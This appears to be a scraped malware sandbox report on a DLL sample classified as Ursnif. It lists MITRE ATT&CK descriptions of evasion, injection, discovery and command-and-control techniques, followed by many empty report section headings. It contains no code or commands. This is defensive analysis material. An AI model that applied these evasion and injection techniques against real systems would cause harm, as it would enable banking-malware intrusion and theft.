Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2e.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph